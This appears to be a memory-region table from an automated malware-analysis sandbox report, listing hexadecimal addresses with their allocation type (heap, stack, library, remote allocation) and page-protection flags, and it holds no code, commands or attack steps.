direct allocation
page execute and read and write
23A91000
unclassified section
page execute and read and write
80AD000
stack
page read and write
6ED0000
trusted library allocation
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
27D6C000
system
page read and write
780000
unkown
page readonly
2C84000
heap
page read and write
840F000
stack
page read and write
4761000
heap
page read and write
2D68000
heap
page read and write
6B2A000
stack
page read and write
15276773000
heap
page read and write
26AE9901000
trusted library allocation
page read and write
4761000
heap
page read and write
2C50000
heap
page read and write
595C000
trusted library allocation
page read and write
4ABC000
stack
page read and write
82CD000
stack
page read and write
7A308FE000
stack
page read and write
204B6000
heap
page read and write
8440000
heap
page read and write
F88000
heap
page read and write
860000
unkown
page read and write
1AE403DA000
trusted library allocation
page read and write
46B1000
trusted library allocation
page read and write
42F1000
unkown
page execute and read and write
2C73000
heap
page read and write
441D000
stack
page read and write
4761000
heap
page read and write
ABE000
heap
page read and write
805B000
stack
page read and write
4761000
heap
page read and write
B40000
unkown
page readonly
4761000
heap
page read and write
7FF848FCA000
trusted library allocation
page read and write
1527490F000
heap
page read and write
7E0F000
stack
page read and write
943000
trusted library allocation
page execute and read and write
7E20000
trusted library allocation
page execute and read and write
2E00000
direct allocation
page read and write
CB0000
unkown
page read and write
9EA000
heap
page read and write
B80000
unkown
page readonly
DA7000
unkown
page readonly
1AE3070A000
trusted library allocation
page read and write
27B52000
system
page read and write
15276991000
heap
page read and write
7A30BBE000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
26AE9814000
trusted library allocation
page read and write
2941000
heap
page read and write
4B89000
heap
page read and write
7A31B8B000
stack
page read and write
15276914000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
C90000
unkown
page read and write
15274954000
heap
page read and write
1AE31F36000
trusted library allocation
page read and write
29A4000
heap
page read and write
7DF4984F0000
trusted library allocation
page execute and read and write
D50000
heap
page read and write
1AE485F0000
heap
page read and write
26AE7B2B000
system
page execute and read and write
4760000
heap
page read and write
4BBE000
stack
page read and write
4761000
heap
page read and write
6C30000
heap
page read and write
4780000
heap
page read and write
2C68000
heap
page read and write
6A60000
direct allocation
page read and write
44D0000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
D91000
unkown
page execute read
15274974000
heap
page read and write
1AE2E4ED000
heap
page read and write
4AFE000
stack
page read and write
15274994000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
72B0000
trusted library allocation
page read and write
4CF1000
unkown
page execute and read and write
4761000
heap
page read and write
2C79000
heap
page read and write
7D43000
heap
page read and write
152748EE000
heap
page read and write
200EF000
stack
page read and write
4761000
heap
page read and write
7DCE000
heap
page read and write
4761000
heap
page read and write
49C0000
trusted library allocation
page read and write
1AE30162000
trusted library allocation
page read and write
2940000
heap
page read and write
890000
heap
page read and write
1AE2E439000
heap
page read and write
26AE9700000
trusted library allocation
page read and write
1AE48909000
heap
page read and write
15276C10000
heap
page read and write
C90000
unkown
page read and write
7D27000
stack
page read and write
DA5000
unkown
page read and write
AF0000
trusted library allocation
page execute and read and write
F5DC6FF000
stack
page read and write
2D0A000
heap
page read and write
4BE9000
direct allocation
page execute and read and write
4761000
heap
page read and write
739B000
stack
page read and write
7FF849110000
trusted library allocation
page read and write
4B17000
heap
page read and write
4761000
heap
page read and write
A0F000
heap
page read and write
4770000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
678000
stack
page read and write
15274983000
heap
page read and write
3104000
unkown
page read and write
BDB89FE000
stack
page read and write
4388000
trusted library allocation
page read and write
468D000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
4D4E000
stack
page read and write
2FEF000
stack
page read and write
2970000
heap
page read and write
A008000
direct allocation
page execute and read and write
880000
unkown
page read and write
950000
trusted library allocation
page read and write
15274971000
heap
page read and write
944000
trusted library allocation
page read and write
29A4000
heap
page read and write
1FF82AF0000
heap
page read and write
4860000
trusted library allocation
page read and write
D80000
unkown
page readonly
7FF848E1D000
trusted library allocation
page execute and read and write
2D40000
heap
page read and write
719E000
stack
page read and write
DA5000
unkown
page read and write
26AE9800000
trusted library allocation
page read and write
D90000
unkown
page readonly
4761000
heap
page read and write
1FC90000
direct allocation
page read and write
4A3E000
stack
page read and write
152768F8000
heap
page read and write
812A000
heap
page read and write
2F58000
remote allocation
page execute and read and write
6C50000
heap
page read and write
4761000
heap
page read and write
26A0000
heap
page read and write
990000
trusted library allocation
page read and write
15276C00000
heap
page read and write
152748C9000
heap
page read and write
152768C9000
heap
page read and write
2C6A000
heap
page read and write
4761000
heap
page read and write
152748E1000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
1AE4891B000
heap
page read and write
2D20000
heap
page read and write
2C79000
heap
page read and write
26A4000
heap
page read and write
CB0000
unkown
page read and write
26AE7CE0000
heap
page read and write
B3C000
stack
page read and write
4761000
heap
page read and write
80EC000
stack
page read and write
D50000
heap
page read and write
1AE30897000
trusted library allocation
page read and write
7A0000
unkown
page readonly
152748A8000
heap
page read and write
DA7000
unkown
page readonly
4761000
heap
page read and write
15276914000
heap
page read and write
26AE9812000
trusted library allocation
page read and write
2DA3000
heap
page read and write
1527491D000
heap
page read and write
4DDB000
stack
page read and write
4761000
heap
page read and write
972000
trusted library allocation
page read and write
4761000
heap
page read and write
4765000
heap
page read and write
26AE99B2000
trusted library allocation
page read and write
3958000
remote allocation
page execute and read and write
15276771000
heap
page read and write
1527699B000
heap
page read and write
15276C0B000
heap
page read and write
7D41000
heap
page read and write
4761000
heap
page read and write
455E000
stack
page read and write
4C344FE000
stack
page read and write
7FF849120000
trusted library allocation
page read and write
4761000
heap
page read and write
20391000
heap
page read and write
1AE2FF48000
heap
page read and write
15274962000
heap
page read and write
2082D000
direct allocation
page execute and read and write
790000
unkown
page readonly
21222000
unclassified section
page execute and read and write
4761000
heap
page read and write
26AE7D5F000
heap
page read and write
4761000
heap
page read and write
1FF82B20000
heap
page read and write
4761000
heap
page read and write
4FDF000
stack
page read and write
D9E000
unkown
page readonly
57CF000
stack
page read and write
1AE4892E000
heap
page read and write
72C0000
trusted library allocation
page read and write
650000
heap
page read and write
1527678C000
heap
page read and write
7FF849000000
trusted library allocation
page execute and read and write
7D93000
heap
page read and write
18EA59F0000
heap
page read and write
29A4000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
4761000
heap
page read and write
7290000
trusted library allocation
page read and write
A3A000
stack
page read and write
15274924000
heap
page read and write
4911000
heap
page read and write
4761000
heap
page read and write
7D5A000
heap
page read and write
D54000
heap
page read and write
4761000
heap
page read and write
7D48000
heap
page read and write
1AE40101000
trusted library allocation
page read and write
2F6F000
stack
page read and write
A88000
heap
page read and write
4640000
heap
page execute and read and write
4761000
heap
page read and write
7FF848E14000
trusted library allocation
page read and write
4761000
heap
page read and write
152768F0000
heap
page read and write
209CD000
direct allocation
page execute and read and write
15274952000
heap
page read and write
9DE000
stack
page read and write
1AE30060000
heap
page execute and read and write
4761000
heap
page read and write
56CE000
stack
page read and write
201EE000
stack
page read and write
202BE000
stack
page read and write
4ED2000
unclassified section
page read and write
7A30A7E000
stack
page read and write
4761000
heap
page read and write
1AE2E390000
heap
page read and write
49C0000
trusted library allocation
page read and write
7E2D000
heap
page read and write
4761000
heap
page read and write
7E00000
heap
page read and write
2C3E000
stack
page read and write
1AE2E3F0000
heap
page read and write
1AE30885000
trusted library allocation
page read and write
4761000
heap
page read and write
26AE9510000
trusted library allocation
page read and write
1AE3087D000
trusted library allocation
page read and write
7A3198E000
stack
page read and write
8DF000
stack
page read and write
7D99000
heap
page read and write
7FF848FF2000
trusted library allocation
page read and write
15274922000
heap
page read and write
6AA0000
direct allocation
page read and write
152768F5000
heap
page read and write
7FF848ED0000
trusted library allocation
page execute and read and write
4C34CFB000
stack
page read and write
4761000
heap
page read and write
7A0000
unkown
page readonly
15274939000
heap
page read and write
4764000
heap
page read and write
4E12000
unclassified section
page read and write
DA5000
unkown
page read and write
4D4F000
trusted library allocation
page read and write
6F7B000
heap
page read and write
4AA000
stack
page read and write
4761000
heap
page read and write
7A30E3E000
stack
page read and write
1527493A000
heap
page read and write
2CFD000
stack
page read and write
18EA5B54000
heap
page read and write
4761000
heap
page read and write
2E9E000
stack
page read and write
4B7A000
heap
page read and write
15274983000
heap
page read and write
4887000
heap
page read and write
152768E0000
heap
page read and write
15276908000
heap
page read and write
152768DD000
heap
page read and write
26AE7D5B000
heap
page read and write
7D87000
heap
page read and write
4A3E000
heap
page read and write
15274922000
heap
page read and write
26AE7D37000
heap
page read and write
4761000
heap
page read and write
BDB81FD000
stack
page read and write
7FF848FC1000
trusted library allocation
page read and write
2054D000
heap
page read and write
4761000
heap
page read and write
1527684D000
heap
page read and write
23091000
unclassified section
page execute and read and write
4761000
heap
page read and write
80F0000
trusted library allocation
page execute and read and write
4C348FF000
stack
page read and write
7D93000
heap
page read and write
49C0000
trusted library allocation
page read and write
26AE7B00000
system
page execute and read and write
785000
heap
page read and write
9E0000
heap
page read and write
1AE30070000
heap
page execute and read and write
4F2F000
stack
page read and write
83B0000
direct allocation
page read and write
4761000
heap
page read and write
5AC000
stack
page read and write
15274983000
heap
page read and write
7A309FE000
stack
page read and write
4761000
heap
page read and write
6AEE000
stack
page read and write
1AE2E660000
heap
page read and write
7E7E000
stack
page read and write
2EA0000
heap
page read and write
56F1000
unkown
page execute and read and write
29A4000
heap
page read and write
4A8E000
stack
page read and write
1527679C000
heap
page read and write
2E90000
remote allocation
page execute and read and write
7D4B000
heap
page read and write
7D60000
trusted library allocation
page read and write
56C1000
trusted library allocation
page read and write
45C0000
heap
page read and write
4761000
heap
page read and write
7DCD000
stack
page read and write
24B0000
unkown
page read and write
4761000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
2CFE000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
21C91000
unclassified section
page execute and read and write
7D98000
heap
page read and write
152768E7000
heap
page read and write
430000
unkown
page readonly
152768C9000
heap
page read and write
4761000
heap
page read and write
2950000
unkown
page readonly
4761000
heap
page read and write
4761000
heap
page read and write
15274A70000
heap
page read and write
15274971000
heap
page read and write
4761000
heap
page read and write
1FF82B95000
heap
page read and write
8340000
trusted library allocation
page execute and read and write
4761000
heap
page read and write
20829000
direct allocation
page execute and read and write
860000
unkown
page read and write
2027E000
stack
page read and write
1AE484CE000
heap
page read and write
4761000
heap
page read and write
26AE7D62000
heap
page read and write
8F0000
heap
page read and write
4B89000
heap
page read and write
15276908000
heap
page read and write
1527679A000
heap
page read and write
7E80000
trusted library allocation
page read and write
4761000
heap
page read and write
2D1C000
unkown
page read and write
6A50000
direct allocation
page read and write
15274913000
heap
page read and write
970000
trusted library allocation
page read and write
4761000
heap
page read and write
152768DF000
heap
page read and write
7330000
trusted library allocation
page read and write
940000
trusted library allocation
page read and write
7E10000
heap
page read and write
6D0000
heap
page read and write
4761000
heap
page read and write
200AE000
stack
page read and write
4761000
heap
page read and write
30BE000
stack
page read and write
4D20000
direct allocation
page read and write
4761000
heap
page read and write
7280000
trusted library allocation
page execute and read and write
2D45000
heap
page read and write
7D9D000
heap
page read and write
7D30000
heap
page read and write
B60000
unkown
page readonly
15276794000
heap
page read and write
1AE312AF000
trusted library allocation
page read and write
6BED000
stack
page read and write
D90000
unkown
page readonly
2C73000
heap
page read and write
4B69000
heap
page read and write
15276C0B000
heap
page read and write
15276990000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
152768CC000
heap
page read and write
7D3E000
heap
page read and write
590F000
stack
page read and write
50EC000
unclassified section
page read and write
930000
trusted library allocation
page read and write
2E60000
heap
page read and write
1080000
unkown
page readonly
7FF848E20000
trusted library allocation
page read and write
1FC80000
direct allocation
page read and write
29A0000
heap
page read and write
1527684D000
heap
page read and write
7F30000
heap
page read and write
6FF1000
heap
page read and write
7A31A0F000
stack
page read and write
1AE31CDD000
trusted library allocation
page read and write
4D8F000
stack
page read and write
1AE2E435000
heap
page read and write
4AB4000
heap
page read and write
29DD000
stack
page read and write
B50000
unkown
page readonly
2C73000
heap
page read and write
4761000
heap
page read and write
2980000
heap
page read and write
1AE2FE40000
trusted library allocation
page read and write
4D30000
direct allocation
page read and write
1AE48943000
heap
page read and write
1AE48957000
heap
page read and write
7EE40000
trusted library allocation
page execute and read and write
D9E000
unkown
page readonly
7310000
trusted library allocation
page read and write
7F0000
heap
page read and write
4761000
heap
page read and write
72F0000
trusted library allocation
page read and write
4761000
heap
page read and write
F80000
heap
page read and write
2A42000
unkown
page read and write
7A30F3E000
stack
page read and write
4B42000
heap
page read and write
440000
unkown
page readonly
4761000
heap
page read and write
7D60000
heap
page read and write
F9F000
heap
page read and write
4761000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
4761000
heap
page read and write
152748EF000
heap
page read and write
1AE3183F000
trusted library allocation
page read and write
F5DC77F000
stack
page read and write
4761000
heap
page read and write
24F0000
unkown
page readonly
2EF1000
unkown
page execute and read and write
4761000
heap
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
1AE2FE42000
trusted library allocation
page read and write
2CB0000
heap
page read and write
8163000
heap
page read and write
152768E5000
heap
page read and write
1FF82BB0000
heap
page read and write
96A000
trusted library allocation
page execute and read and write
1AE2E431000
heap
page read and write
8B40000
direct allocation
page execute and read and write
15276990000
heap
page read and write
D91000
unkown
page execute read
4B10000
heap
page read and write
1411000
unkown
page readonly
871000
unkown
page readonly
46C0000
heap
page read and write
2C57000
heap
page read and write
1AE30304000
trusted library allocation
page read and write
6A70000
direct allocation
page read and write
1527495A000
heap
page read and write
2022F000
stack
page read and write
4C34AFE000
stack
page read and write
28D8000
stack
page read and write
2D60000
heap
page read and write
63C000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
15276789000
heap
page read and write
1527679C000
heap
page read and write
4761000
heap
page read and write
49B0000
heap
page read and write
1AE48550000
heap
page execute and read and write
D40000
unkown
page read and write
1FF82B00000
heap
page read and write
ED1000
system
page execute and read and write
7D2D000
heap
page read and write
4761000
heap
page read and write
1AE400EF000
trusted library allocation
page read and write
15274946000
heap
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
6EC0000
heap
page execute and read and write
2D3F000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
2C79000
stack
page read and write
15276871000
heap
page read and write
8100000
heap
page read and write
15274942000
heap
page read and write
7A30AFE000
stack
page read and write
4A3A000
heap
page read and write
1AE2E640000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
1527699D000
heap
page read and write
CA1000
unkown
page readonly
4761000
heap
page read and write
4761000
heap
page read and write
26AE9816000
trusted library allocation
page read and write
7E90000
trusted library allocation
page read and write
4761000
heap
page read and write
4F9E000
stack
page read and write
4761000
heap
page read and write
7E10000
trusted library allocation
page read and write
2943000
heap
page read and write
7E0A000
heap
page read and write
CD0000
heap
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
1AE488A0000
heap
page read and write
1527498C000
heap
page read and write
15274956000
heap
page read and write
83C0000
direct allocation
page read and write
2E00000
direct allocation
page read and write
4761000
heap
page read and write
2034B000
stack
page read and write
435F000
stack
page read and write
838F000
stack
page read and write
4761000
heap
page read and write
20676000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
8420000
heap
page read and write
44D7000
heap
page read and write
6F8C000
heap
page read and write
7A30FBB000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
2012D000
stack
page read and write
4761000
heap
page read and write
E7A000
system
page execute and read and write
1527491E000
heap
page read and write
1AE2E665000
heap
page read and write
1AE2E451000
heap
page read and write
458F000
stack
page read and write
71946FF000
unkown
page read and write
420000
unkown
page readonly
D91000
unkown
page execute read
4761000
heap
page read and write
4761000
heap
page read and write
1AE318E5000
trusted library allocation
page read and write
1527677C000
heap
page read and write
1AE31D52000
trusted library allocation
page read and write
7A31B0B000
stack
page read and write
89E000
stack
page read and write
7FF849170000
trusted library allocation
page read and write
4E9D000
stack
page read and write
830C000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
1AE2E4E9000
heap
page read and write
4761000
heap
page read and write
7D82000
heap
page read and write
8300000
trusted library allocation
page read and write
152767F5000
heap
page read and write
76E000
stack
page read and write
4761000
heap
page read and write
26AE9803000
trusted library allocation
page read and write
71947FF000
stack
page read and write
20393000
heap
page read and write
8360000
trusted library allocation
page read and write
15276771000
heap
page read and write
26AE99CE000
trusted library allocation
page read and write
4F2C000
unclassified section
page read and write
4761000
heap
page read and write
24E0000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
289B000
stack
page read and write
4761000
heap
page read and write
3000000
heap
page read and write
2F80000
heap
page read and write
1527490E000
heap
page read and write
152768ED000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
1AE48460000
heap
page read and write
4761000
heap
page read and write
4D8D000
direct allocation
page execute and read and write
1AE4890B000
heap
page read and write
4761000
heap
page read and write
1AE2E5C0000
heap
page read and write
15274956000
heap
page read and write
15274931000
heap
page read and write
1AE315C7000
trusted library allocation
page read and write
152748E9000
heap
page read and write
7EB0000
trusted library allocation
page read and write
4761000
heap
page read and write
7D24000
heap
page read and write
8434000
heap
page read and write
D40000
unkown
page read and write
7FF848ECC000
trusted library allocation
page execute and read and write
4761000
heap
page read and write
2D00000
heap
page read and write
4804000
trusted library allocation
page read and write
4A10000
heap
page read and write
4C347FF000
stack
page read and write
4B71000
heap
page read and write
A3A000
stack
page read and write
7350000
trusted library allocation
page read and write
15274978000
heap
page read and write
4C346FF000
stack
page read and write
4AB0000
heap
page read and write
20A42000
direct allocation
page execute and read and write
4B83000
heap
page read and write
4AAF000
heap
page read and write
D54000
heap
page read and write
5F0000
unkown
page readonly
4B78000
heap
page read and write
4AC0000
direct allocation
page execute and read and write
15276791000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
B60000
unkown
page readonly
15274C50000
heap
page read and write
8176000
heap
page read and write
4761000
heap
page read and write
4910000
trusted library allocation
page execute and read and write
2C73000
heap
page read and write
7A3087F000
stack
page read and write
D91000
unkown
page execute read
A80000
heap
page read and write
B3C000
stack
page read and write
1AE2E630000
heap
page readonly
7EA0000
trusted library allocation
page read and write
7E77000
trusted library allocation
page read and write
446E000
stack
page read and write
28F0000
heap
page read and write
1AE488B0000
heap
page read and write
CE0000
unkown
page read and write
4761000
heap
page read and write
15276C12000
heap
page read and write
4761000
heap
page read and write
1AE2FF30000
heap
page read and write
18EA5A30000
heap
page read and write
26AE96E0000
heap
page read and write
4A90000
heap
page read and write
4761000
heap
page read and write
6F50000
heap
page read and write
2B02000
unkown
page read and write
15276905000
heap
page read and write
4D39000
trusted library allocation
page read and write
4B3B000
stack
page read and write
4A7E000
stack
page read and write
4761000
heap
page read and write
2CF6000
heap
page read and write
4761000
heap
page read and write
7DEF000
heap
page read and write
A1D000
heap
page read and write
1527495B000
heap
page read and write
83A0000
direct allocation
page read and write
4761000
heap
page read and write
1FC30000
direct allocation
page read and write
15276870000
heap
page read and write
4761000
heap
page read and write
6A2B000
stack
page read and write
4761000
heap
page read and write
4D40000
direct allocation
page read and write
4761000
heap
page read and write
451E000
stack
page read and write
7FF849070000
trusted library allocation
page read and write
AE0000
heap
page readonly
43DC000
stack
page read and write
83CE000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
810000
heap
page read and write
2938000
heap
page read and write
2940000
heap
page read and write
26AE9510000
trusted library allocation
page read and write
2067A000
heap
page read and write
1FC60000
direct allocation
page read and write
F3C000
stack
page read and write
152768D5000
heap
page read and write
7E70000
trusted library allocation
page read and write
920000
trusted library section
page read and write
1527491B000
heap
page read and write
4761000
heap
page read and write
4B71000
heap
page read and write
4B7A000
heap
page read and write
152748E1000
heap
page read and write
2B5C000
unkown
page read and write
209D1000
direct allocation
page execute and read and write
15274A90000
heap
page read and write
26AE7BC0000
heap
page read and write
291F000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
1AE31E44000
trusted library allocation
page read and write
4761000
heap
page read and write
6EE0000
heap
page read and write
15276914000
heap
page read and write
F5DC67C000
stack
page read and write
1AE2E411000
heap
page read and write
1527495B000
heap
page read and write
26A0000
heap
page read and write
1FC20000
direct allocation
page read and write
54D4000
unclassified section
page read and write
CD6000
heap
page read and write
4761000
heap
page read and write
7A30B3E000
unkown
page read and write
15276781000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
28154000
system
page read and write
4BED000
direct allocation
page execute and read and write
7A31A8D000
stack
page read and write
4761000
heap
page read and write
770000
heap
page read and write
1FF82BB8000
heap
page read and write
26AE7D4C000
heap
page read and write
4761000
heap
page read and write
4B69000
heap
page read and write
4C28000
heap
page read and write
2C3B000
stack
page read and write
4761000
heap
page read and write
4B6B000
heap
page read and write
1527498B000
heap
page read and write
842D000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
1AE484AE000
heap
page read and write
1AE2E479000
heap
page read and write
440000
unkown
page readonly
4761000
heap
page read and write
B40000
unkown
page readonly
7E30000
trusted library allocation
page read and write
4761000
heap
page read and write
2E82000
unkown
page execute and read and write
1AE48557000
heap
page execute and read and write
1AE300D0000
heap
page read and write
26AE7CA0000
heap
page read and write
6A80000
direct allocation
page read and write
2089E000
direct allocation
page execute and read and write
152768D8000
heap
page read and write
2FB0000
heap
page read and write
5E0000
unkown
page readonly
721E000
stack
page read and write
7320000
trusted library allocation
page read and write
7DBE000
heap
page read and write
8370000
direct allocation
page read and write
6A40000
direct allocation
page read and write
18EA581B000
heap
page read and write
4761000
heap
page read and write
4F1E000
stack
page read and write
1FF82BA0000
heap
page read and write
1527494A000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
15274983000
heap
page read and write
4761000
heap
page read and write
20390000
heap
page read and write
810000
heap
page read and write
4B78000
heap
page read and write
4AA000
stack
page read and write
4FAC000
stack
page read and write
2C3F000
stack
page read and write
1AE31D37000
trusted library allocation
page read and write
6A30000
direct allocation
page read and write
There are 1165 hidden memdumps, click here to show them.